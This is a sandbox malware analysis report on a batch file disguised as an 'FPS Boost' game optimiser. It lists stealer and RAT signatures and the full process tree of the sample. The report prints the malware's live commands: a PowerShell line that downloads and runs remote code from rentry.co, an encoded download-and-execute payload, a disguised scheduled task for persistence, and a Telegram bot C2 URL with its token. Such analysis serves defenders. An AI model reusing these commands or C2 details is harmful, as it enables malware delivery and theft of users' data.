Analysis

  • max time kernel
    93s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-10-2024 12:45

General

  • Target

    FPS Boost 1.bat.zip

  • Size

    4KB

  • MD5

    f606e366fe37903c4c0371dac16605de

  • SHA1

    826e9869acc36c9f5befd821b57282720ffb4113

  • SHA256

    a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05

  • SHA512

    a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555

  • SSDEEP

    96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Enumerates connected drives 3 TTPs 14 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FPS Boost 1.bat.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:5108
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\FPS Boost 1.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\system32\mode.com
      mode 128,33
      2⤵
        PID:1376
      • C:\Windows\System32\reg.exe
        Reg.exe query "HKU\S-1-5-19\Environment"
        2⤵
          PID:4896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3360
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\dwn.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4056
            • C:\Windows\System32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:400
            • C:\Windows\System32\schtasks.exe
              schtasks /create /tn "Windows updater" /tr "C:\Users\Public\dwn.bat" /sc ONLOGON /ru Admin /f
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1724
            • C:\Windows\System32\attrib.exe
              attrib +h "C:\Users\Public\dwn.bat"
              4⤵
              • Views/modifies file attributes
              PID:4504
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"
              4⤵
              • UAC bypass
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops file in Drivers directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4172
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
          2⤵
            PID:1484
          • C:\Windows\System32\findstr.exe
            findstr /v /a:8 /R "^$" " ] " nul
            2⤵
              PID:2376
            • C:\Windows\System32\findstr.exe
              findstr /v /a:F /R "^$" " Cleaner " nul
              2⤵
                PID:3084
              • C:\Windows\System32\findstr.exe
                findstr /v /a:8 /R "^$" " [ " nul
                2⤵
                  PID:4900
                • C:\Windows\System32\findstr.exe
                  findstr /v /a:B /R "^$" " 2 " nul
                  2⤵
                    PID:4416
                  • C:\Windows\System32\findstr.exe
                    findstr /v /a:8 /R "^$" " ] " nul
                    2⤵
                      PID:1516
                    • C:\Windows\System32\findstr.exe
                      findstr /v /a:F /R "^$" " Game Booster " nul
                      2⤵
                        PID:4692
                      • C:\Windows\System32\findstr.exe
                        findstr /v /a:8 /R "^$" " [ " nul
                        2⤵
                          PID:4024
                        • C:\Windows\System32\findstr.exe
                          findstr /v /a:B /R "^$" " 3 " nul
                          2⤵
                            PID:1472
                          • C:\Windows\System32\findstr.exe
                            findstr /v /a:B /R "^$" " 7 " nul
                            2⤵
                              PID:4996
                            • C:\Windows\System32\findstr.exe
                              findstr /v /a:8 /R "^$" " ] " nul
                              2⤵
                                PID:4780
                              • C:\Windows\System32\findstr.exe
                                findstr /v /a:F /R "^$" " Debloat " nul
                                2⤵
                                  PID:512
                                • C:\Windows\System32\findstr.exe
                                  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                  2⤵
                                    PID:4392
                                  • C:\Windows\System32\findstr.exe
                                    findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                    2⤵
                                      PID:2680
                                    • C:\Windows\System32\findstr.exe
                                      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                      2⤵
                                        PID:1848
                                      • C:\Windows\System32\findstr.exe
                                        findstr /v /a:8 /R "^$" " [ " nul
                                        2⤵
                                          PID:4184
                                        • C:\Windows\System32\findstr.exe
                                          findstr /v /a:B /R "^$" " 1 " nul
                                          2⤵
                                            PID:1276
                                          • C:\Windows\System32\findstr.exe
                                            findstr /v /a:8 /R "^$" " ] " nul
                                            2⤵
                                              PID:4192
                                            • C:\Windows\System32\findstr.exe
                                              findstr /v /a:F /R "^$" " Cleaner " nul
                                              2⤵
                                                PID:4896
                                              • C:\Windows\System32\findstr.exe
                                                findstr /v /a:8 /R "^$" " [ " nul
                                                2⤵
                                                  PID:3088
                                                • C:\Windows\System32\findstr.exe
                                                  findstr /v /a:B /R "^$" " 2 " nul
                                                  2⤵
                                                    PID:872
                                                  • C:\Windows\System32\findstr.exe
                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                    2⤵
                                                      PID:2196
                                                    • C:\Windows\System32\findstr.exe
                                                      findstr /v /a:F /R "^$" " Game Booster " nul
                                                      2⤵
                                                        PID:2208
                                                      • C:\Windows\System32\findstr.exe
                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                        2⤵
                                                          PID:4204
                                                        • C:\Windows\System32\findstr.exe
                                                          findstr /v /a:B /R "^$" " 3 " nul
                                                          2⤵
                                                            PID:4520
                                                          • C:\Windows\System32\findstr.exe
                                                            findstr /v /a:B /R "^$" " 7 " nul
                                                            2⤵
                                                              PID:4336
                                                            • C:\Windows\System32\findstr.exe
                                                              findstr /v /a:8 /R "^$" " ] " nul
                                                              2⤵
                                                                PID:4592
                                                              • C:\Windows\System32\findstr.exe
                                                                findstr /v /a:F /R "^$" " Debloat " nul
                                                                2⤵
                                                                  PID:3276
                                                                • C:\Windows\System32\findstr.exe
                                                                  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                  2⤵
                                                                    PID:4424
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic process where name="javaw.exe" CALL setpriority "realtime"
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4392
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic process where name="svchost.exe" CALL setpriority "realtime"
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4560
                                                                  • C:\Windows\System32\findstr.exe
                                                                    findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                                                    2⤵
                                                                      PID:3012
                                                                    • C:\Windows\System32\findstr.exe
                                                                      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                                                      2⤵
                                                                        PID:2928
                                                                      • C:\Windows\System32\findstr.exe
                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                        2⤵
                                                                          PID:1632
                                                                        • C:\Windows\System32\findstr.exe
                                                                          findstr /v /a:B /R "^$" " 1 " nul
                                                                          2⤵
                                                                            PID:1676
                                                                          • C:\Windows\System32\findstr.exe
                                                                            findstr /v /a:8 /R "^$" " ] " nul
                                                                            2⤵
                                                                              PID:4732
                                                                            • C:\Windows\System32\findstr.exe
                                                                              findstr /v /a:F /R "^$" " Cleaner " nul
                                                                              2⤵
                                                                                PID:4792
                                                                              • C:\Windows\System32\findstr.exe
                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                2⤵
                                                                                  PID:5020
                                                                                • C:\Windows\System32\findstr.exe
                                                                                  findstr /v /a:B /R "^$" " 2 " nul
                                                                                  2⤵
                                                                                    PID:2820
                                                                                  • C:\Windows\System32\findstr.exe
                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                    2⤵
                                                                                      PID:2036
                                                                                    • C:\Windows\System32\findstr.exe
                                                                                      findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                      2⤵
                                                                                        PID:1492
                                                                                      • C:\Windows\System32\findstr.exe
                                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                                        2⤵
                                                                                          PID:4236
                                                                                        • C:\Windows\System32\findstr.exe
                                                                                          findstr /v /a:B /R "^$" " 3 " nul
                                                                                          2⤵
                                                                                            PID:4072
                                                                                          • C:\Windows\System32\findstr.exe
                                                                                            findstr /v /a:B /R "^$" " 7 " nul
                                                                                            2⤵
                                                                                              PID:2652
                                                                                            • C:\Windows\System32\findstr.exe
                                                                                              findstr /v /a:8 /R "^$" " ] " nul
                                                                                              2⤵
                                                                                                PID:5056
                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                2⤵
                                                                                                  PID:1276
                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                  2⤵
                                                                                                    PID:3212
                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                    findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                                                                                    2⤵
                                                                                                      PID:5116
                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                                                                                      2⤵
                                                                                                        PID:4228
                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                                                        2⤵
                                                                                                          PID:1052
                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                          findstr /v /a:B /R "^$" " 1 " nul
                                                                                                          2⤵
                                                                                                            PID:1688
                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                            findstr /v /a:8 /R "^$" " ] " nul
                                                                                                            2⤵
                                                                                                              PID:3360
                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                              findstr /v /a:F /R "^$" " Cleaner " nul
                                                                                                              2⤵
                                                                                                                PID:1460
                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                2⤵
                                                                                                                  PID:8
                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                  findstr /v /a:B /R "^$" " 2 " nul
                                                                                                                  2⤵
                                                                                                                    PID:4256
                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                    2⤵
                                                                                                                      PID:1216
                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                      findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                                                      2⤵
                                                                                                                        PID:4420
                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                        2⤵
                                                                                                                          PID:3236
                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                          findstr /v /a:B /R "^$" " 3 " nul
                                                                                                                          2⤵
                                                                                                                            PID:5064
                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                            findstr /v /a:B /R "^$" " 7 " nul
                                                                                                                            2⤵
                                                                                                                              PID:1736
                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                              findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                              2⤵
                                                                                                                                PID:2788
                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                                                2⤵
                                                                                                                                  PID:4124
                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                                                  2⤵
                                                                                                                                    PID:2272
                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                    Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f
                                                                                                                                    2⤵
                                                                                                                                      PID:3956
                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t REG_DWORD /d "0" /f
                                                                                                                                      2⤵
                                                                                                                                        PID:2676
                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1964
                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                          findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                                                                                                                          2⤵
                                                                                                                                            PID:2844
                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                            findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                                                                                                                            2⤵
                                                                                                                                              PID:3632
                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                              findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                              2⤵
                                                                                                                                                PID:1996
                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                findstr /v /a:B /R "^$" " 1 " nul
                                                                                                                                                2⤵
                                                                                                                                                  PID:3468
                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                  findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4056
                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                    findstr /v /a:F /R "^$" " Cleaner " nul
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1564
                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                      findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                      2⤵
                                                                                                                                                        PID:400
                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                        findstr /v /a:B /R "^$" " 2 " nul
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1572
                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                          findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1324
                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                            findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3880
                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                              findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2776
                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                findstr /v /a:B /R "^$" " 3 " nul
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2852
                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                  findstr /v /a:B /R "^$" " 7 " nul
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2848
                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1676
                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                      findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2112
                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                        findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:100
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:1088
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:3620
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *WindowsAlarms* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2344
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *WindowsCamera* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:208
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2424
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *MicrosoftOfficeHub* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:828
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *OneNote* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:3476
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *people* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4560
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *WindowsPhone* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4732
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *solit* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:3572
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *WindowsSoundRecorder* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:1276
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2196
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4256
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Sway* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:3604
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *CommsPhone* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:688
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *ConnectivityStore* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:400
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2928
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Facebook* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:100
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Twitter* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:1848
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          PowerShell -Command "Get-AppxPackage *Drawboard PDF* | Remove-AppxPackage"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:2588
                                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1052
                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                            PID:4468
                                                                                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies visibility of file extensions in Explorer
                                                                                                                                                                            PID:2644
                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                            taskkill /f /im explorer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:1980
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            explorer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:3228
                                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                                            findstr /v /a:08 /R "^$" " Version 2.0 " nul
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3592
                                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                                              findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1736
                                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3796
                                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                                  findstr /v /a:B /R "^$" " 1 " nul
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1452
                                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2844
                                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                                      findstr /v /a:F /R "^$" " Cleaner " nul
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4612
                                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                                        findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4512
                                                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                                                          findstr /v /a:B /R "^$" " 2 " nul
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4312
                                                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                                                            findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4868
                                                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                                                              findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                                                                                                                              2⤵
